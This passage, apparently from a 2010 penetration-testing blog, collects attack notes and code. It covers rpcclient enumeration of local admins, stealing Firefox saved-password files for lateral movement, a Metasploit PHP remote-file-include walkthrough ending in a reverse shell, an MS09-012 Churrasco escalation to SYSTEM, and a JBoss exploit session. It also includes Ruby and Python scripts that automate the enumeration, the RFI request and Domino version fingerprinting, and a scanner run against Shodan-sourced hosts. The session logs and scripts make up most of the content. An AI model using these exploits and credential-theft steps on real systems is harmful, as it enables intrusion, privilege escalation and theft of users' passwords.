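Two things fall out of this for the odd captures mentioned above: a response that changes between attempts for the same account means the client is using a client-side nonce (NTLMv2 or LMv2 style), which no fixed-challenge table can touch; and the sniffed responses only help against the first 7 characters, so the NT response in the last field, not the LM one, is what you brute force for the remainder.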

Wednesday, June 30, 2010

more with rpcclient

Got asked to help remotely locate local admins on boxes on a network.

rpcclient $> enumalsgroups
Usage: enumalsgroups builtin|domain [access mask]

rpcclient $> enumalsgroups builtin

group:[Administrators] rid:[0x220]

group:[Backup Operators] rid:[0x227]

group:[Guests] rid:[0x222]

group:[Network Configuration Operators] rid:[0x22c]

group:[Power Users] rid:[0x223]

group:[Remote Desktop Users] rid:[0x22b]

group:[Replicator] rid:[0x228]

group:[Users] rid:[0x221]

Now you would think that doing a querygroup would give you the right output, but actually you get a:

rpcclient $> querygroup 0x220

Honestly I have no idea why this doesn't work, it *should*. If anyone knows why it doesn't I know more than one person who would like to know.

Anyway, it takes one more step, but you can do it this way. (Administrators and the rest of BUILTIN are SAM aliases rather than groups, so the alias commands are the ones to use:)

rpcclient $> queryaliasmem
Usage: queryaliasmem builtin|domain rid [access mask]

rpcclient $> queryaliasmem builtin 0x220



Then you can look up who those SIDs belong to

rpcclient $> lookupsids

Usage: lookupsids [sid1 [sid2 [...]]]

rpcclient $> lookupsids S-1-5-21-1214440339-1383384898-839522115-500
S-1-5-21-1214440339-1383384898-839522115-500 PC\Administrator (1)

rpcclient $> lookupsids
S-1-5-21-1214440339-1383384898-839522115-1003 PC\user (1)

rpcclient $> lookupsids
S-1-5-21-2392188729-2485841371-4291725810-512 rpc_api_pipe: Remote machine pipe \lsarpc fnum 0x4001 returned critical error. Error was Call timed out: server did not respond after 10000 milliseconds result was NT_STATUS_IO_TIMEOUT

Not sure about the 512 (it's an MS built-in account I think), but the 1003 was the user I added to the local admins group.
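Doing this across a network by hand gets old fast, so here is the chain (queryaliasmem, then lookupsids, then a look at each SID) as a Ruby script, added as an example for this page rather than anything from Samba or the post. It shells out to rpcclient with Open3, so it needs Samba's rpcclient on the path and credentials for the target to run for real; the parsers are exercised against constructed output modelled on the listings above, and the sid:[...] line format for queryaliasmem is an assumption since the post's own output was cut. The RID table covers the few well-known ones: 500 is the built-in Administrator, and 512 is Domain Admins, which is why a SID with a different domain prefix and RID 512 in the local Administrators alias is the domain's admin group.

```ruby
require 'open3'

# Chain the three rpcclient calls into one script and resolve what comes back.
# Samba's rpcclient must be on the PATH and you need creds for the target.
WELL_KNOWN_RIDS = {
  500 => 'Administrator', 501 => 'Guest',
  512 => 'Domain Admins', 513 => 'Domain Users', 519 => 'Enterprise Admins'
}.freeze

# Run one rpcclient command and return its stdout.
def rpcclient(target, user, pass, command)
  out, _err, _status = Open3.capture3('rpcclient', '-U', "#{user}%#{pass}", "//#{target}", '-c', command)
  out
end

# "queryaliasmem builtin 0x220" prints one "sid:[S-1-5-...]" line per member
# (format assumed from Samba's output; the post's listing was cut).
def parse_alias_members(output)
  output.scan(/sid:\[(S-1-5-[\d-]+)\]/).flatten
end

# "lookupsids" prints "<SID> <DOMAIN>\<name> (<type>)" per SID it could resolve;
# error lines (like the NT_STATUS_IO_TIMEOUT above) simply don't match.
def parse_lookupsids(output)
  output.scan(/^(S-1-5-[\d-]+)\s+(\S+)\s+\((\d+)\)/)
        .to_h { |sid, name, type| [sid, { name: name, type: type.to_i }] }
end

# Split a SID into domain part and RID, say whether it belongs to the box's
# own SAM or to another domain, and name the RID if it is a well-known one.
def describe_sid(sid, local_domain_sid)
  domain, _sep, rid = sid.rpartition('-')
  rid = rid.to_i
  {
    domain: domain,
    rid: rid,
    scope: domain == local_domain_sid ? 'local' : 'other domain',
    well_known: WELL_KNOWN_RIDS[rid]
  }
end

# Members of BUILTIN\Administrators (alias RID 0x220) as [sid, name-or-nil] pairs.
def local_admins(target, user, pass)
  members = parse_alias_members(rpcclient(target, user, pass, 'queryaliasmem builtin 0x220'))
  return [] if members.empty?
  names = parse_lookupsids(rpcclient(target, user, pass, "lookupsids #{members.join(' ')}"))
  members.map { |sid| [sid, names.dig(sid, :name)] }
end

if __FILE__ == $PROGRAM_NAME && ARGV.size == 3
  # ruby local_admins.rb <target> <user> <pass>
  local_admins(*ARGV).each { |sid, name| puts "#{sid}  #{name || '(unresolved)'}" }
end
```

The unresolved case is the interesting one on a real engagement: a SID the box cannot look up (the lsarpc timeout above) but whose prefix is not the machine's own SID is a domain principal that has been made a local admin, and the RID tells you which kind.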

Monday, June 28, 2010

Firefox Saved Passwords

Nothing earth shattering, but since this is a place for my notes...

Sometimes, when you are on a box and pilfering through all the documents doesn't yield anything useful for moving laterally, you can grab the Firefox saved passwords. Lots of times someone will have saved their password to the corporate OWA, wiki, helpdesk page, or whatever. Even if it doesn't give you a *great* lead, you'll at least get an idea of whether they are a password re-user or not.

So how to do it?

Actually it's simple. Inside the mozilla\firefox directory will be a somethingrandom.default profile folder. Inside that folder you'll find:


If there is no master password set, all you have to do is replace the files on your test VM with the two files you downloaded, open Firefox, go to Preferences, Security, and View Saved Passwords.

I think there are some fancy Firefox plug-ins that can pull this info out, and I'm sure there are some binaries you can push up that will dump it for you as well. But this is quick and easy, and you're probably already downloading files (at least you probably *should* be) anyway...

-thanks to Mubix for telling me about this.

Friday, June 25, 2010

Android and another use for XSS

This morning I saw a tweet by @dinodaizovi. Dino posted a comment regarding an article by Google (you can find it here) responding to an interesting method of gaining root via "RootStrap" (link: here).

To summarize, Google sort of dismissed the idea that this application (and research) by @jonoberheide was damaging, because the application he created didn't have "root" permissions; it simply had network permissions to download rootkits and install them in areas of the device not meant for normal applications.

Google/Android removed the application with an over-the-air update. We are saved! ...okay {sarcasm}

It got me thinking, I remembered something I touched on during a presentation at a recent NoVAH Hackers meeting. The idea was basically using something like XSS to redirect an Android user to download an attacker's application(s).

Here is the video, stick around to the end, you may get a chuckle.

Android and another use for XSS from cktricky on Vimeo.

Happy Hacking!


Tuesday, June 22, 2010

wxruby on Ubuntu

Thank you to Mario Steele for creating a wxruby gem compatible with the more recent versions of Ubuntu's G++ compiler.

You can download the gem Here .

Install by.....

sudo gem install --local wxruby-2.0.1-x86-linux.gem

If you've tried to run DirChex or DirSnatch you'll notice problems. The above tip should help to resolve.

~Happy Hacking

Wednesday, May 26, 2010

Burp 1.3.5 & Android SSL Apps update

As of the release of Burp 1.3.5 the same methodology shown in a previous post video (using Android SSL enforced apps with Burp) is a bit different.

You still need to import Burp as a CA on Android (using keytool and the BouncyCastle provider), but Burp now generates certificates on the fly (correctly), so you no longer need to configure your own CA cert in Burp for each app.

Also, if you are running Ubuntu it's likely you have multiple versions of the Java JVM installed.

This affects keytool; actually, it affects the classpath location for the jar file "bcprov-jdk16-141.jar".

For instance, I had both:

/usr/lib/jvm/java-6-sun-     &      /usr/lib/jvm/java-6-sun-

So a quick fix is to perform a

sudo apt-get remove sun-java6-bin sun-java6-jre sun-java6-jdk

and then

sudo apt-get install sun-java6-bin sun-java6-jre sun-java6-jdk

Then move the bcprov-jdk16-141.jar file back into your newest jvm directory (as of now

~Happy Hacking

Wednesday, May 19, 2010


Thanks to a tip from a friend it turns out I've had the wrong version of DirSnatch posted all along. Nobody complained so I had no clue. My apologies, this was developed while on travel and ........well stuff happens.

To sum it all up, a working version of DirSnatch_v2.1 both source & executable have been uploaded.

To recap:

The 2.1 version has the following mods

1) Added tab to export all directories & sub-directories in URL format so that you can test each for PUT (see DirChex) or whatever else you may need this for.

2) Progression bar so you can see the status

3) Better threading to keep the GUI functional

Happy Hacking!


Tuesday, May 11, 2010

Using the Metasploit PHP Remote File Include Module

Metasploit has a nifty PHP Remote File Include module that gets you a command shell from an RFI.

Not too complicated to use: set your normal RHOST/RPORT options, set PATH, and set PHPURI to the vulnerable path with XXpathXX where you would normally put the URL of your PHP shell. So we take something like the Simple Text-File Login Remote File Include that has a vulnerable string of:
and make your PHPURI
Let's see it in action:
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...


Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info

Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent

Provided by:

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload information:
Space: 32768

This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the

msf exploit(php_include) > set PHPURI /
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL:
[*] PHP include server started.
[*] Sending /1/
[*] Command shell session 1 opened ( -> at Sun May 09 21:37:26 -0400 2010

0.jpeg license.txt slog_users.txt version.txt
1.jpeg index.asp old
adminlog.php install.txt readme.txt slogin_genpass.php launch.asp slog_users.php

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
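To make the XXpathXX mechanics concrete, here is an added example (my own code, not the php_include module's) that plays both ends of the exchange on localhost: a tiny include server standing in for the module's "PHP include server", a builder that turns PATH + PHPURI into the request the module sends, and a stand-in for the vulnerable side doing include($_GET['inc']) with allow_url_include on. The vulnerable URI index.php?inc=XXpathXX, the documentation-range RHOST, and the marker payload are all assumptions; nothing is sent to the RHOST, only to the local include server.

```python
import http.server
import threading
import urllib.parse
import urllib.request

XXPATH = "XXpathXX"

# Constructed stand-in for the PHP the module serves. The real module sends a
# full PHP stager; a tagged echo is enough to prove the round trip here.
PAYLOAD = b"<?php echo 'rfi-marker:' . php_uname(); ?>"


class IncludeHandler(http.server.BaseHTTPRequestHandler):
    """Answer every GET with PAYLOAD, as the module's include server does for its URIPATH."""

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(PAYLOAD)))
        self.end_headers()
        self.wfile.write(PAYLOAD)

    def log_message(self, fmt, *args):  # keep the demo quiet
        return


def start_include_server(host="127.0.0.1", port=0):
    """Bind the SRVHOST:SRVPORT equivalent (port 0 picks a free port) and serve in a thread."""
    srv = http.server.HTTPServer((host, port), IncludeHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def build_rfi_url(rhost, rport, path, phpuri, include_url):
    """Assemble the request the module sends: PATH prepended to PHPURI, with
    XXpathXX replaced by the URL-encoded address of the include server."""
    if XXPATH not in phpuri:
        raise ValueError("PHPURI must contain XXpathXX where the include parameter goes")
    uri = phpuri.replace(XXPATH, urllib.parse.quote(include_url, safe=""))
    return "http://%s:%d%s/%s" % (rhost, rport, path.rstrip("/"), uri.lstrip("/"))


def simulate_vulnerable_include(request_url, param):
    """Stand-in for PHP doing include($_GET[param]) with allow_url_include=On:
    take the parameter straight from the query string and fetch whatever it names."""
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(request_url).query)
    included = query[param][0]
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore env proxies
    with opener.open(included, timeout=5) as resp:
        return resp.read()


def rfi_roundtrip():
    """Run the whole exchange locally and return the bytes the 'vulnerable app' pulled in.
    Only the include server is contacted; the RHOST below is a documentation address."""
    srv = start_include_server()
    try:
        host, port = srv.server_address[:2]
        include_url = "http://%s:%d/" % (host, port)
        # Hypothetical vulnerable URI; the post's own PHPURI value is not reproduced here.
        target = build_rfi_url("203.0.113.10", 80, "/1/", "index.php?inc=" + XXPATH, include_url)
        return simulate_vulnerable_include(target, "inc")
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(build_rfi_url("203.0.113.10", 80, "/1/", "index.php?inc=XXpathXX", "http://198.51.100.5:8080/x"))
    print(rfi_roundtrip())
```

Two things the round trip makes obvious: the include server has to be reachable from the target, so SRVHOST must be an address the victim can route to rather than 127.0.0.1, and the request only turns into code execution because the PHP side fetches and evaluates a remote URL, which is exactly what allow_url_include=Off (the default on any PHP that matters) and a fixed allowlist of includable files prevent.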

Monday, May 10, 2010

Playing with the MS09-012 Windows Local Exploit

Back in 2009 there was a buzz about Token Kidnapping by Argeniss, which Microsoft subsequently patched (MS09-012).

I'm normally violently against uploading binaries to boxes but until the local exploit functionality is added to msf...

The gist is that you can run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privileges you get when exploiting IIS). See the slides for more.

Lets see it in action.

We have our NETWORK SERVICE shell; push up the Churrasco binary and a Metasploit payload, and run it.

*I had issues on my VM getting staged payloads in msf to run, so I opted for a shell/reverse_tcp and then tried to upgrade the shell to meterpreter.
[*] Meterpreter session 3 opened ( ->

meterpreter > getuid
meterpreter > pwd
Upload the exploit binary and your reverse shell binary. I used the WebDAV vuln that got me on the box to upload it as churrasco.bin. NETWORK SERVICE is weird about where it can write to, but something should be writable somewhere if you don't have the file upload route.
meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\windows\system32\inetsrv>cd C:\Inetpub\wwwroot
Volume in drive C has no label.
Volume Serial Number is F48F-220E

Directory of C:\Inetpub\wwwroot

05/10/2010 06:53 AM .
05/10/2010 06:53 AM ..
05/10/2010 06:53 AM 410,624 Churrasco.bin
02/21/2003 06:48 PM 1,433 iisstart.htm
05/10/2010 07:19 AM 37,888 shell.bin
05/10/2010 07:43 AM 173 test4.asp;.txt
4 File(s) 2,105,685 bytes
2 Dir(s) 36,227,641,344 bytes free
Let's run the exploit and have it kick off our reverse shell back to us (set up a multi/handler for shell.bin's payload first):
C:\Inetpub\wwwroot>Churrasco.bin shell.bin
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM
On the multi/handler side:
[*] Command shell session 1 opened ( ->

(C) Copyright 1985-2003 Microsoft Corp.

nt authority\system

Background session 1? [y/N] y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened ( ->

msf exploit(handler) > sessions -l

Active sessions

Id Type Information Connection
-- ---- ----------- ----------
1 shell Microsoft Windows [Version 5.2.3790] ->
2 meterpreter NT AUTHORITY\SYSTEM @ LAB ->

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Sunday, May 9, 2010

Metasploit jboss deployment file repository exploit

MC pushed out a new exploit today (jboss_deploymentfilerepository).

While it lists 4.x as vulnerable, several other versions are vulnerable as well, including 6.0.0.M1 and 5.1.0 :-)
msf exploit(jboss_deploymentfilerepository) > exploit

[*] Started reverse handler on
[*] Triggering payload at '/web-console/HYQ.jsp'...
[*] Command shell session 3 opened ( -> at Sun May 09 11:20:31 -0400 2010

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>whoami

C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>^Z
Background session 3? [y/N] y
msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions

Id Type Information Connection
-- ---- ----------- ----------
3 shell ->

msf exploit(jboss_deploymentfilerepository) > sessions -u 3

msf exploit(jboss_deploymentfilerepository) >
msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened ( -> at Sun May 09 11:21:32 -0400 2010

msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions

Id Type Information Connection
-- ---- ----------- ----------
3 shell ->
4 meterpreter win2k3lab\Administrator @ win2k3lab ->

msf exploit(jboss_deploymentfilerepository) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: win2k3lab\Administrator
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin
meterpreter >

Thursday, May 6, 2010

Layer Four Traceroute

Layer Four Traceroute (lft)

If you are using the one bundled with your distro, you are probably missing out on some of the more interesting new features.

From the site:

"LFT, short for Layer Four Traceroute, is a sort of 'traceroute' that often works much faster (than the commonly-used Van Jacobson method) and goes through many configurations of packet-filters (firewalls). More importantly, LFT implements numerous other features including AS number lookups through several reliable sources, loose source routing, netblock name lookups, et al. What makes LFT unique? LFT is the all-in-one traceroute tool because it can launch a variety of different probes using ICMP, UDP, and TCP protocols, or the RFC1393 trace method."

It's been useful for me to locate more systems between me and the target host, as well as for identifying gateways/web firewalls that organizations send all (or some) web traffic through.

It's also handy that you can throw it some switches to show the AS and network routes with the scan as well.

Old traceroute:

cg@meh:~/evil/lft-3.1$ traceroute
traceroute to (, 30 hops max, 60 byte packets
 1 ( 4.681 ms 5.794 ms 14.193 ms
 2-8 Local Stuff
 9 ( 35.743 ms 36.391 ms 37.102 ms
10 ( 173.747 ms 174.136 ms 175.054 ms
11 ( 32.762 ms 33.703 ms 37.096 ms
12 ( 17.652 ms 28.151 ms 24.033 ms
13 ( 24.864 ms 25.951 ms 26.485 ms
14 ( 109.384 ms 109.615 ms 110.180 ms
15 ( 106.607 ms 107.401 ms 110.382 ms
16 ( 112.458 ms 118.682 ms 106.207 ms
17 ( 107.323 ms 107.552 ms 107.789 ms
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 * * *
24 * * *
25 * * *
26 * * *
27 * * *
28 * * *
29 * * *
30 * * *

Layer Four Traceroute:

cg@meh:~/evil/lft-3.1$ sudo lft -rNS -d 80
TTL LFT trace to
 1 [33657] [CMCS] 2.3/1.5ms
** [neglected] no reply packets received from TTLs 2 through 8 (local stuff)
 9 [7922] [COMCAST-7922] ( 27.2/26.6ms
10 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ( 25.9/24.3ms
11 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] 15.8/24.3ms
12 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ( 34.1/14.8ms
13 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ( 16.0/15.9ms
14 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ( 121.3/98.2ms
15 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ( 114.1/97.3ms
16 [6067] [ONYX] 101.6/99.9ms
17 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] 99.5/109.5ms
18 [AS?] [Net?] [target open] 98.5/109.4ms

Wednesday, May 5, 2010

Android SSL Apps & Burp

As a follow-up to the post regarding intercepting Android applications on the emulator using Burp, I wanted to give a solution for intercepting applications on Android that enforce SSL/TLS correctly.

I ran into this problem with an app that enforced SSL/TLS. The app refused to communicate with Burp because of the certificate mismatch error. Unlike a browser you don't have the option to make an exception. Hence the app died and at the time I couldn't perform testing.

This video provides a solution I cooked up by reading some manuals and searching the web. Enjoy.

Android SSL Enforced Apps & Burp from cktricky on Vimeo.

~Happy Hacking!

Metasploit Lotus Domino Version Scanner

I pushed out the first of a few Lotus Domino modules I've been working on to the Metasploit trunk last night.

The first one is a Lotus Domino Version Module.

There is no real "banner grabbing" for versions with Lotus Domino. Very old versions may display the version in the Server header, but I've never seen anything above 5.x do this. You usually get something like:

HTTP/1.0 200 OK
Server: Lotus-Domino
Date: Fri, 30 Apr 2010 00:19:11 GMT
Last-Modified: Wed, 07 Apr 2010 01:39:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5390
Cache-control: private

as headers.

That is useful enough to identify a Domino web server, but not much help with the couple of remote exploits out there, which are very version- and/or fixpack-dependent.

There are a couple of files the web server may serve up that contain version information.

The first is iNotes/FormsX.nsf, which usually has the version information as a comment in the HTML (this can be turned off). The second is the download/filesets/l_LOTUS_SCRIPT.inf type of file, which has the base install version (at least as far as I can tell it is the base install; if that's not right, please let me know).
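As an added example of the check order described above (my own code, not the lotus_domino_version module): confirm Domino from the Server header, take a version from that header if an old server still leaks one, then pull the FormsX.nsf comment for the running release and a fileset .inf for the base install, recording 302s instead of following them. The responses are fed in through a fetch callback so the whole thing runs against the constructed in-memory hosts below; the exact text of the FormsX.nsf comment, the "Version=" line in the .inf files, the Lotus-Domino/5.x header form and the Forms5 through Forms8 file names are all assumptions modelled on the scanner output in this post.

```python
import re

# "Server: Lotus-Domino" alone is the usual header; a version suffix (e.g.
# Lotus-Domino/5.0.8) is assumed for the old releases that still leak one.
SERVER_RE = re.compile(r"^Lotus-Domino(?:/(\d[\d.]*))?", re.I)
# Assumed form of the comment in iNotes/FormsX.nsf, modelled on the strings the scanner
# printed: "6.5.4 (Windows NT/Intel)", "8.0.2 HF1190 (Windows NT/Intel)", "7.0.3FP1 (...)".
RELEASE_RE = re.compile(r"Domino Release\s+(\d[\w.]*(?:\s+HF\d+)?)\s*\(([^)]+)\)")
# Assumed INI-style "Version=" line inside the download/filesets/*.inf files.
INF_VERSION_RE = re.compile(r"^\s*Version\s*=\s*(\d[\d.]*)\s*$", re.M)

# X in FormsX.nsf is a major release; this list is an assumption. Both .inf names appear in the post.
FORMS_PATHS = ["iNotes/Forms5.nsf", "iNotes/Forms6.nsf", "iNotes/Forms7.nsf", "iNotes/Forms8.nsf"]
INF_PATHS = ["download/filesets/l_LOTUS_SCRIPT.inf", "download/filesets/l_SEARCH.inf"]


def parse_forms_release(body):
    m = RELEASE_RE.search(body)
    return (m.group(1), m.group(2)) if m else None


def parse_inf_version(body):
    m = INF_VERSION_RE.search(body)
    return m.group(1) if m else None


def _get(fetch, base_path, path, out):
    """Body for a 200; 302s and dead paths are logged the way the scanner reports them."""
    r = fetch(base_path.rstrip("/") + "/" + path)
    if r is None:
        out["errors"].append("no response for " + path)
        return None
    status, headers, body = r
    if status in (301, 302):
        out["redirects"].append((path, headers.get("Location", "")))
        return None
    return body if status == 200 else None


def fingerprint(fetch, base_path="/"):
    """fetch(path) -> (status, headers_dict, body) or None when nothing answers."""
    out = {"is_domino": False, "header_version": None, "current_version": None,
           "platform": None, "base_install": None, "redirects": [], "errors": []}
    root = fetch(base_path)
    if root is None:
        out["errors"].append("no response for " + base_path)
        return out
    m = SERVER_RE.match(root[1].get("Server", ""))
    if not m:
        return out  # not Domino: nothing below is worth requesting
    out["is_domino"], out["header_version"] = True, m.group(1)
    for path in FORMS_PATHS:  # running release, first hit wins
        body = _get(fetch, base_path, path, out)
        found = parse_forms_release(body) if body is not None else None
        if found:
            out["current_version"], out["platform"] = found
            break
    for path in INF_PATHS:  # base install version
        body = _get(fetch, base_path, path, out)
        ver = parse_inf_version(body) if body is not None else None
        if ver:
            out["base_install"] = ver
            break
    return out


# Constructed hosts: an R5 box that leaks its version in the header, a 6.5.4 server
# patched up from a 6.0.4 base install, and one that bounces everything to a login form.
SAMPLE_HOSTS = {
    "r5-lab": {"/": (200, {"Server": "Lotus-Domino/5.0.8"}, "<html></html>")},
    "654-lab": {
        "/": (200, {"Server": "Lotus-Domino"}, "<html></html>"),
        "/iNotes/Forms5.nsf": (404, {}, "Not Found"),
        "/iNotes/Forms6.nsf": (200, {}, "<html><!-- Domino Release 6.5.4 (Windows NT/Intel) --></html>"),
        "/download/filesets/l_LOTUS_SCRIPT.inf": (200, {}, "[Version]\nVersion=6.0.4\n"),
    },
    "redirector": {
        "/": (200, {"Server": "Lotus-Domino"}, ""),
        "/iNotes/Forms5.nsf": (302, {"Location": "https://mail.example.test/names.nsf?Login"}, ""),
    },
}


def make_fetch(table):
    """Offline fetch backed by a dict; swap in urllib against RHOSTS for a live run."""
    return lambda path: table.get(path)


if __name__ == "__main__":
    for name, table in SAMPLE_HOSTS.items():
        print(name, fingerprint(make_fetch(table)))
```

The redirect case matters in practice: a server that 302s every unauthenticated request to names.nsf is why the run below shows blocks of "302 Redirect to" lines with no version, and following those redirects would only fingerprint the login page.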

So let's give it a test drive...

msf > use auxiliary/scanner/lotus/lotus_domino_version
msf auxiliary(lotus_domino_version) > info

Name: Lotus Domino Version
Version: $Revision$
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes path
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host

Checks to determine Lotus Domino Server Version.

msf auxiliary(lotus_domino_version) > set RHOSTS file:/home/user/shodan-domino.txt
RHOSTS => file:/home/user/shodan-domino.txt
msf auxiliary(lotus_domino_version) > run

[*] Lotus Domino Current Version: 6.5.4 (Windows NT/Intel)
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Current Version: 6.5.5 (Solaris Sparc)
[*] Lotus Domino Base Install Version: 6.0.4
[*] Lotus Domino Base Install Version: 6.0.4
[-] no response for download/filesets/l_SEARCH.inf
[*] Lotus Domino Base Install Version: 6.0.4
[*] Scanned 02 of 20 hosts (010% complete)
[*] Lotus Domino Current Version: 8.0.2 HF1190 (Windows NT/Intel)
[*] Lotus Domino Current Version: 8.0.2 HF1190 (Windows NT/Intel)
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[-] 302 Redirect to
[-] 302 Redirect to
[-] 302 Redirect to
[-] 302 Redirect to
[-] 302 Redirect to
[-] 302 Redirect to
[-] 302 Redirect to
[*] Scanned 04 of 20 hosts (020% complete)
[*] Lotus Domino Current Version: 7.0.1 (Windows NT/Intel)
[*] Lotus Domino Current Version: 7.0.1 (Windows NT/Intel)
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Scanned 06 of 20 hosts (030% complete)
[*] Lotus Domino Current Version: 7.0.2 (Windows NT/Intel)
[*] Lotus Domino Current Version: 7.0.2 (Windows NT/Intel)
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Current Version: 7.0.3FP1 (Windows NT/Intel)
[*] Lotus Domino Current Version: 7.0.3FP1 (Windows NT/Intel)
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version:
[*] Lotus Domino Base Install Version: